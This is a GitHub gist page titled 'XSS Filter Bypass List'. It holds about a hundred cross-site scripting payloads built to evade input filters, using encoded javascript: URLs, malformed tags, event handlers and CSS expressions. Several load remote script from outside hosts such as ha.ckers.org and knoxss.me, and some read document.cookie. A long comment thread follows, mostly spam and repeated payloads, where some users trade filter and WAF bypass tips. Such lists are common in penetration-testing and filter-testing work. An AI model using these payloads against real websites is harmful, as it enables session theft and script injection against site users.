Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
XSS Filter Bypass List
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
<a onmouseover="alert(document.cookie)">xxs link</a>
<a onmouseover=alert(document.cookie)>xxs link</a>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=# onmouseover="alert('xxs')">
<IMG SRC= onmouseover="alert('xxs')">
<IMG onmouseover="alert('xxs')">
<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;
&#39;&#88;&#83;&#83;&#39;&#41;>
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&
#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="jav&#x09;ascript:alert('XSS');">
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
<IMG SRC=" &#14; javascript:alert('XSS');">
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<<SCRIPT>alert("XSS");//<</SCRIPT>
<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >
<SCRIPT SRC=//ha.ckers.org/.j>
<IMG SRC="javascript:alert('XSS')"
<iframe src=http://ha.ckers.org/scriptlet.html <
\";alert('XSS');//
</script><script>alert('XSS');</script>
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<BODY BACKGROUND="javascript:alert('XSS')">
<IMG DYNSRC="javascript:alert('XSS')">
<IMG LOWSRC="javascript:alert('XSS')">
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>
<IMG SRC='vbscript:msgbox("XSS")'>
<IMG SRC="livescript:[code]">
<BODY ONLOAD=alert('XSS')>
<BGSOUND SRC="javascript:alert('XSS');">
<BR SIZE="&{alert('XSS')}">
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
exp/*<A STYLE='no\xss:noxss("*//*");
xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<XSS STYLE="xss:expression(alert('XSS'))">
<XSS STYLE="behavior: url(xss.htc);">
¼script¾alert(¢XSS¢)¼/script¾
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
<TABLE BACKGROUND="javascript:alert('XSS')">
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">
<DIV STYLE="width: expression(alert('XSS'));">
<!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]-->
<BASE HREF="javascript:alert('XSS');//">
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"-->
<? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?>
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<A HREF="http://66.102.7.147/">XSS</A>
0\"autofocus/onfocus=alert(1)--><video/poster/ error=prompt(2)>"-confirm(3)-"
veris-->group<svg/onload=alert(/XSS/)//
#"><img src=M onerror=alert('XSS');>
element[attribute='<img src=x onerror=alert('XSS');>
[<blockquote cite="]">[" onmouseover="alert('RVRSH3LL_XSS');" ]
%22;alert%28%27RVRSH3LL_XSS%29//
javascript:alert%281%29;
<w contenteditable id=x onfocus=alert()>
alert;pg("XSS")
<svg/onload=%26%23097lert%26lpar;1337)>
<script>for((i)in(self))eval(i)(1)</script>
<scr<script>ipt>alert(1)</scr</script>ipt><scr<script>ipt>alert(1)</scr</script>ipt>
<sCR<script>iPt>alert(1)</SCr</script>IPt>
<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">test</a>
@ninja25538

This comment has been minimized.

Copy link

ninja25538 commented Aug 8, 2017

Nice!, Thanks!

@Walidhossain010

This comment has been minimized.

Copy link

Walidhossain010 commented Oct 12, 2017

which worked most??

@Cache-Bounty

This comment has been minimized.

Copy link

Cache-Bounty commented Apr 6, 2018

test

@CesBear

This comment has been minimized.

Copy link

CesBear commented May 8, 2018

cool

@xeno6696

This comment has been minimized.

Copy link

xeno6696 commented May 10, 2018

@Noob-Walid: It's doubtful that any of these are going to "work" right out of the box. You'll want to use a fuzzer against a suspected form field, and see what tag types even partially "make it through." Though, all of these inputs are available at OWASP, and actually are also available from both fuzzdb and SecLists in text files that contain the name "rsnake."

As a matter of fact, all of you should just clone those repos.

@0xINT3

This comment has been minimized.

Copy link

0xINT3 commented Sep 1, 2018

many don't even work. websites are getting smart. :/

@sittminzaw

This comment has been minimized.

Copy link

sittminzaw commented Sep 5, 2018

"autofocus/onfocus=alert(`Bug´)-->
also work

@IvanGuGon1

This comment has been minimized.

Copy link

IvanGuGon1 commented Jan 1, 2019

<SCRIPT>document.write("PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
@Marshmellow471

This comment has been minimized.

Copy link

Marshmellow471 commented Jan 26, 2019

@Marshmellow471

This comment has been minimized.

Copy link

Marshmellow471 commented Jan 26, 2019

rip github xss protection

@Marshmellow471

This comment has been minimized.

Copy link

Marshmellow471 commented Jan 26, 2019

here, sons. <img src = x onerror = alert( document.cookies ) >

@Marshmellow471

This comment has been minimized.

Copy link

Marshmellow471 commented Jan 26, 2019

start with > and without the spaces

@Marshmellow471

This comment has been minimized.

Copy link

Marshmellow471 commented Jan 26, 2019

fuck

@Marshmellow471

This comment has been minimized.

Copy link

Marshmellow471 commented Jan 26, 2019

<h1>no</h1>

@Marshmellow471

This comment has been minimized.

Copy link

Marshmellow471 commented Jan 26, 2019

no

@shamrocksu88

This comment has been minimized.

Copy link

shamrocksu88 commented Feb 1, 2019

KNOX

@shamrocksu88

This comment has been minimized.

Copy link

shamrocksu88 commented Feb 1, 2019

KNOX

@shamrocksu88

This comment has been minimized.

Copy link

shamrocksu88 commented Feb 1, 2019

S05PWA==

@shamrocksu88

This comment has been minimized.

Copy link

shamrocksu88 commented Feb 1, 2019

PDFLTk9YPDE=

@shamrocksu88

This comment has been minimized.

Copy link

shamrocksu88 commented Feb 1, 2019

'"KNOX

@shamrocksu88

This comment has been minimized.

Copy link

shamrocksu88 commented Feb 1, 2019

KNOX\

@shamrocksu88

This comment has been minimized.

Copy link

shamrocksu88 commented Feb 1, 2019

confirmK

@shamrocksu88

This comment has been minimized.

Copy link

shamrocksu88 commented Feb 1, 2019

(confirm)(1)

@shamrocksu88

This comment has been minimized.

Copy link

shamrocksu88 commented Feb 1, 2019

'-confirmK-'

@shamrocksu88

This comment has been minimized.

Copy link

shamrocksu88 commented Feb 1, 2019

"-confirmK-"

@shamrocksu88

This comment has been minimized.

Copy link

shamrocksu88 commented Feb 1, 2019

${(confirm)(1)}

@shamrocksu88

This comment has been minimized.

Copy link

shamrocksu88 commented Feb 1, 2019

1</Script/"'--><Svg /OnLoad=appendChild(createElement(Script)).src=https://KnoXSS.me\x2F00?1=6243>

@nizeman72

This comment has been minimized.

Copy link

nizeman72 commented Feb 12, 2019

<sCR<script>iPt>alert(1)</SCr</script>IPt>

@nizeman72

This comment has been minimized.

Copy link

nizeman72 commented Feb 12, 2019

iji

@nizeman72

This comment has been minimized.

Copy link

nizeman72 commented Feb 12, 2019

<SCRIPT>document.write("PT SRC="http://ha.ckers.org/xss.js"</SCRIPT>
@nizeman72

This comment has been minimized.

Copy link

nizeman72 commented Feb 12, 2019

<script>document.write("PT SRC="http://ha.ckers.org/xss.js"></script>
@nizeman72

This comment has been minimized.

Copy link

nizeman72 commented Feb 12, 2019

<script>document.write("pt src="http://ha.ckers.org/xss.js"></script>
@nizeman72

This comment has been minimized.

Copy link

nizeman72 commented Feb 12, 2019

<script>document.write("pt src="http://ha.ckers.org/xss.js"</script>
@nizeman72

This comment has been minimized.

Copy link

nizeman72 commented Feb 12, 2019

<img src=xonerror=alert( document.cookies)>

@nizeman72

This comment has been minimized.

Copy link

nizeman72 commented Feb 12, 2019

<img src = x onerror = alert( document.cookies ) >

@nizeman72

This comment has been minimized.

Copy link

nizeman72 commented Feb 12, 2019

<scr<script>ipt>alert(1)</scr</script>ipt><scr<script>ipt>alert(1)</scr</script>ipt>

@nizeman72

This comment has been minimized.

Copy link

nizeman72 commented Feb 12, 2019

</Script/"'--><Svg /OnLoad=appendChild(createElement(Script)).src=https://KnoXSS.me\x2F00?1=6243>

@nizeman72

This comment has been minimized.

Copy link

nizeman72 commented Feb 12, 2019

</Script/"'--><Svg /OnLoad=appendChild(createElement(Script)).src=`https://KnoXSS.me\x2F00?1=6243</script>

@nizeman72

This comment has been minimized.

Copy link

nizeman72 commented Feb 12, 2019

</Script/"'--><Svg /OnLoad=appendChild(createElement(Script)).src=https://KnoXSS.me\x2F00?1=6243>

@nizeman72

This comment has been minimized.

Copy link

nizeman72 commented Feb 12, 2019

@nizeman72

This comment has been minimized.

Copy link

nizeman72 commented Feb 16, 2019

Lol

@nizeman72

This comment has been minimized.

Copy link

nizeman72 commented Feb 16, 2019

test

@nizeman72

This comment has been minimized.

Copy link

nizeman72 commented Feb 16, 2019

<script>alert(fuck)</script>
@Yashin2134

This comment has been minimized.

Copy link

Yashin2134 commented Feb 22, 2019

@Yashin2134

This comment has been minimized.

Copy link

Yashin2134 commented Feb 22, 2019

Skip to content
Search…
All gists
Back to GitHub
New gist
@Yashin2134
187
68 @rvrsh3llrvrsh3ll/xxsfilterbypass.lst
Last active 2 days ago •

<script src="https://gist.github.com/rvrsh3ll/09a8b933291f9f98e8ec.js"></script>

Code Revisions 4 Stars 187 Forks 68
XSS Filter Bypass List
xxsfilterbypass.lst
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"=&{()}
0"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>

<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

xxs link xxs link

<SCRIPT>alert("XSS")</SCRIPT>">

@Yashin2134

This comment has been minimized.

Copy link

Yashin2134 commented Feb 22, 2019

<SCRIPT>alert("XSS")</SCRIPT>">

@wlanpsk

This comment has been minimized.

Copy link

wlanpsk commented Mar 28, 2019

Mmm

@EDMPL

This comment has been minimized.

Copy link

EDMPL commented Apr 1, 2019

test

@EDMPL

This comment has been minimized.

Copy link

EDMPL commented Apr 1, 2019

nice

@s04v

This comment has been minimized.

Copy link

s04v commented Apr 9, 2019

Test

@itayze

This comment has been minimized.

Copy link

itayze commented Apr 13, 2019

<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&
#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>

@ABCyborg25

This comment has been minimized.

Copy link

ABCyborg25 commented Apr 15, 2019

Hi All,

I am new to InfoSec and need a small help from you dignitaries

While performing XSS what if my web aplication Firewall is blocking certain words like Alert, Script etc.

TIA for your answers!

@m1lw0rm

This comment has been minimized.

Copy link

m1lw0rm commented Apr 16, 2019

@m1lw0rm

This comment has been minimized.

Copy link

m1lw0rm commented Apr 16, 2019

@T3ap0T

This comment has been minimized.

Copy link

T3ap0T commented Apr 18, 2019

rofl xss in the comments
plz

@UnknownUserG

This comment has been minimized.

Copy link

UnknownUserG commented Apr 26, 2019

Prompt('XSS') can be used in place of Alert('XSS') if the alert keyword is blocked

@r3dx00

This comment has been minimized.

Copy link

r3dx00 commented Apr 28, 2019

Markdown allows bold txt and e.t.c, why y'all flexing ?

@Pr070n321

This comment has been minimized.

Copy link

Pr070n321 commented May 7, 2019

AAA

@Pr070n321

This comment has been minimized.

Copy link

Pr070n321 commented May 7, 2019

AAA

@Pr070n321

This comment has been minimized.

Copy link

Pr070n321 commented May 7, 2019

AAA

@Pr070n321

This comment has been minimized.

Copy link

Pr070n321 commented May 7, 2019

AAA

@Pr070n321

This comment has been minimized.

Copy link

Pr070n321 commented May 7, 2019

AAA

@Pr070n321

This comment has been minimized.

Copy link

Pr070n321 commented May 7, 2019

s

@Pr070n321

This comment has been minimized.

Copy link

Pr070n321 commented May 7, 2019

s

@Pr070n321

This comment has been minimized.

Copy link

Pr070n321 commented May 7, 2019

a

@Pr070n321

This comment has been minimized.

Copy link

Pr070n321 commented May 7, 2019

a

@Pr070n321

This comment has been minimized.

Copy link

Pr070n321 commented May 7, 2019

a

@Pr070n321

This comment has been minimized.

Copy link

Pr070n321 commented May 7, 2019

a

@Sachin-hodkasia

This comment has been minimized.

Copy link

Sachin-hodkasia commented May 9, 2019

"><img src=x onerror=confirm(12);

@DrShrox

This comment has been minimized.

Copy link

DrShrox commented Jun 25, 2019

a

@DrShrox

This comment has been minimized.

Copy link

DrShrox commented Jun 25, 2019

<script>alert("xss")</script>
@DrShrox

This comment has been minimized.

Copy link

DrShrox commented Jun 25, 2019

@darkness203

This comment has been minimized.

Copy link

darkness203 commented Jun 28, 2019

';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"=&{()}
0"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>

<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

xxs link xxs link

<SCRIPT>alert("XSS")</SCRIPT>">

@realarrch

This comment has been minimized.

Copy link

realarrch commented Jul 1, 2019

TEST

@aniruddhmistry

This comment has been minimized.

Copy link

aniruddhmistry commented Aug 25, 2019

test">

@captain99hook

This comment has been minimized.

Copy link

captain99hook commented Sep 2, 2019

@captain99hook

This comment has been minimized.

Copy link

captain99hook commented Sep 2, 2019

No description provided.

@captain99hook

This comment has been minimized.

Copy link

captain99hook commented Sep 2, 2019

No description provided.

@REHAAAM

This comment has been minimized.

Copy link

REHAAAM commented Sep 16, 2019

<SCRIPT>alert("XSS")</SCRIPT>">
@REHAAAM

This comment has been minimized.

Copy link

REHAAAM commented Sep 16, 2019

hkora"<

@REHAAAM

This comment has been minimized.

Copy link

REHAAAM commented Sep 16, 2019

<SCRIPT>alert("XSS")</SCRIPT>">
@vishu10x00

This comment has been minimized.

Copy link

vishu10x00 commented Oct 21, 2019

<font/color=blue>vishnu

@Pr070n321

This comment has been minimized.

Copy link

Pr070n321 commented Oct 22, 2019

@Pr070n321

This comment has been minimized.

Copy link

Pr070n321 commented Oct 22, 2019

[AAA](';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"=&{()}
0"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>

<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

xxs link xxs link

<SCRIPT>alert("XSS")</SCRIPT>">

@Pr070n321

This comment has been minimized.

Copy link

Pr070n321 commented Oct 22, 2019

';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"=&{()}
0"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>

<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

xxs link xxs link

<SCRIPT>alert("XSS")</SCRIPT>">

@Pr070n321

This comment has been minimized.

Copy link

Pr070n321 commented Oct 22, 2019

@Pr070n321

This comment has been minimized.

Copy link

Pr070n321 commented Oct 22, 2019

#"><img src=M onerror=alert('XSS');>

@Pr070n321

This comment has been minimized.

Copy link

Pr070n321 commented Oct 22, 2019

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">


<IMG SRC= onmouseover="alert('xxs')">

@Pr070n321

This comment has been minimized.

Copy link

Pr070n321 commented Oct 22, 2019

<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME> [
[" onmouseover="alert('RVRSH3LL_XSS');" ]
@Pr070n321

This comment has been minimized.

Copy link

Pr070n321 commented Oct 22, 2019

<IMG SRC= onmouseover="alert('xxs')">

@Pr070n321

This comment has been minimized.

Copy link

Pr070n321 commented Oct 22, 2019

@Pr070n321

This comment has been minimized.

Copy link

Pr070n321 commented Oct 22, 2019

@Pr070n321

This comment has been minimized.

Copy link

Pr070n321 commented Oct 22, 2019

<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
@Pr070n321

This comment has been minimized.

Copy link

Pr070n321 commented Oct 22, 2019

@Pr070n321

This comment has been minimized.

Copy link

Pr070n321 commented Oct 22, 2019

<>
<IMG SRC= onmouseover="alert('xxs')">
<>

@Pr070n321

This comment has been minimized.

Copy link

Pr070n321 commented Oct 22, 2019

<IMG SRC= onmouseover="alert('xxs')">

@Pr070n321

This comment has been minimized.

Copy link

Pr070n321 commented Oct 22, 2019

@Pr070n321

This comment has been minimized.

Copy link

Pr070n321 commented Oct 22, 2019

<">
<IMG SRC= onmouseover="alert('xxs')">

@Pr070n321

This comment has been minimized.

Copy link

Pr070n321 commented Oct 22, 2019

@Pr070n321

This comment has been minimized.

Copy link

Pr070n321 commented Oct 22, 2019

<IMG #>
<IMG SRC= onmouseover="alert('xxs')">

@Pr070n321

This comment has been minimized.

Copy link

Pr070n321 commented Oct 22, 2019

src=#
<IMG SRC= onmouseover="alert('xxs')">

@Pr070n321

This comment has been minimized.

Copy link

Pr070n321 commented Oct 22, 2019

@Pr070n321

This comment has been minimized.

Copy link

Pr070n321 commented Oct 22, 2019

<SRC=#>
<IMG SRC= onmouseover="alert('xxs')">

@Pr070n321

This comment has been minimized.

Copy link

Pr070n321 commented Oct 22, 2019

IMGSRC=#
<IMG SRC= onmouseover="alert('xxs')">

@Pr070n321

This comment has been minimized.

Copy link

Pr070n321 commented Oct 22, 2019

IMG SRC=#
<IMG SRC= onmouseover="alert('xxs')">

@Pr070n321

This comment has been minimized.

Copy link

Pr070n321 commented Oct 22, 2019

<IMG SRC=#
IMG SRC= onmouseover="alert('xxs')">

@Pr070n321

This comment has been minimized.

Copy link

Pr070n321 commented Oct 22, 2019

@Pr070n321

This comment has been minimized.

Copy link

Pr070n321 commented Oct 22, 2019

@Pr070n321

This comment has been minimized.

Copy link

Pr070n321 commented Oct 22, 2019


onmouseover="alert('xxs')">
@Pr070n321

This comment has been minimized.

Copy link

Pr070n321 commented Oct 22, 2019


onmouseover="alert('xxs')">
@Pr070n321

This comment has been minimized.

Copy link

Pr070n321 commented Oct 22, 2019

@Pr070n321

This comment has been minimized.

Copy link

Pr070n321 commented Oct 22, 2019

@Pr070n321

This comment has been minimized.

Copy link

Pr070n321 commented Oct 22, 2019

@Pr070n321

This comment has been minimized.

Copy link

Pr070n321 commented Oct 22, 2019

@Pr070n321

This comment has been minimized.

Copy link

Pr070n321 commented Oct 22, 2019

@Pr070n321

This comment has been minimized.

Copy link

Pr070n321 commented Oct 22, 2019

<IMG SRC=>

@Pr070n321

This comment has been minimized.

Copy link

Pr070n321 commented Oct 22, 2019

@Pr070n321

This comment has been minimized.

Copy link

Pr070n321 commented Oct 22, 2019

@Pr070n321

This comment has been minimized.

Copy link

Pr070n321 commented Oct 22, 2019

@Pr070n321

This comment has been minimized.

Copy link

Pr070n321 commented Oct 22, 2019

@Pr070n321

This comment has been minimized.

Copy link

Pr070n321 commented Oct 22, 2019

@Pr070n321

This comment has been minimized.

Copy link

Pr070n321 commented Oct 22, 2019

<IMG SRC=https:google.com

@Pr070n321

This comment has been minimized.

Copy link

Pr070n321 commented Oct 22, 2019

@Pr070n321

This comment has been minimized.

Copy link

Pr070n321 commented Oct 22, 2019

@Pr070n321

This comment has been minimized.

Copy link

Pr070n321 commented Oct 22, 2019

@Pr070n321

This comment has been minimized.

Copy link

Pr070n321 commented Oct 22, 2019

@Pr070n321

This comment has been minimized.

Copy link

Pr070n321 commented Oct 22, 2019

@Pr070n321

This comment has been minimized.

Copy link

Pr070n321 commented Oct 22, 2019

@Pr070n321

This comment has been minimized.

Copy link

Pr070n321 commented Oct 22, 2019

@Pr070n321

This comment has been minimized.

Copy link

Pr070n321 commented Oct 22, 2019

No description provided.

@Pr070n321

This comment has been minimized.

Copy link

Pr070n321 commented Oct 22, 2019

No description provided.

@Pr070n321

This comment has been minimized.

Copy link

Pr070n321 commented Oct 22, 2019

@Pr070n321

This comment has been minimized.

Copy link

Pr070n321 commented Oct 22, 2019

@Pr070n321

This comment has been minimized.

Copy link

Pr070n321 commented Oct 22, 2019

@javascript : alert(1)

@Pr070n321

This comment has been minimized.

Copy link

Pr070n321 commented Oct 22, 2019

@javascriptalert(1)

@Pr070n321

This comment has been minimized.

Copy link

Pr070n321 commented Oct 22, 2019

@javascriptalert

@Lazydev10

This comment has been minimized.

Copy link

Lazydev10 commented Dec 13, 2019

@Lazydev10

This comment has been minimized.

Copy link

Lazydev10 commented Dec 13, 2019

@Lazydev10

This comment has been minimized.

Copy link

Lazydev10 commented Dec 13, 2019

@Lazydev10

This comment has been minimized.

Copy link

Lazydev10 commented Dec 13, 2019

@Lazydev10

This comment has been minimized.

Copy link

Lazydev10 commented Dec 13, 2019

@Lazydev10

This comment has been minimized.

Copy link

Lazydev10 commented Dec 13, 2019

@Lazydev10

This comment has been minimized.

Copy link

Lazydev10 commented Dec 13, 2019

@Lazydev10

This comment has been minimized.

Copy link

Lazydev10 commented Dec 13, 2019

@Lazydev10

This comment has been minimized.

Copy link

Lazydev10 commented Dec 13, 2019

qwe

@Lazydev10

This comment has been minimized.

Copy link

Lazydev10 commented Dec 13, 2019

xss

@Lazydev10

This comment has been minimized.

Copy link

Lazydev10 commented Dec 13, 2019

nice

@Lazydev10

This comment has been minimized.

Copy link

Lazydev10 commented Dec 13, 2019

<script language="php">echo phpinfo();</script>
@Lazydev10

This comment has been minimized.

Copy link

Lazydev10 commented Dec 13, 2019

qwe

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.